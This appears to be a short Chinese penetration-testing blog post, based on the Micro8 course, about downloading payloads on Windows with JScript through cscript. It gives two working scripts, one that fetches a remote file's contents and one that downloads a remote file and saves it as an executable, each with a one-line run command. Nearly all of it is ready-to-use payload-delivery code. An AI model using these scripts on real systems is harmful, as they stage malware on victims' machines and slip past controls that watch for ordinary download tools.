JS一句话下载payload [ Mi1k7ea ]

0x00 前言

参考Micro8系列第四十三课：https://micro8.gitbook.io/micro8/contents-1/41-50/43js-yi-ju-hua-xia-zai-payload#fu-dai-ma-1

0x01 JS一句话下载payload

Windows全版本支持JS，并且通过cscript来调用达到下载payload的目的。

读取远程文件

readfile.js：

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

一句话读取远程文件payload：

1 2	D:\>cscript /nologo readfile.js http://127.0.0.1/test.txt mi1k7ea

写入文件

downfile.js：

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;

BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("mi1k7ea.exe");

一句话写入文件payload：

1	cscript /nologo downfile.js http://127.0.0.1/test.txt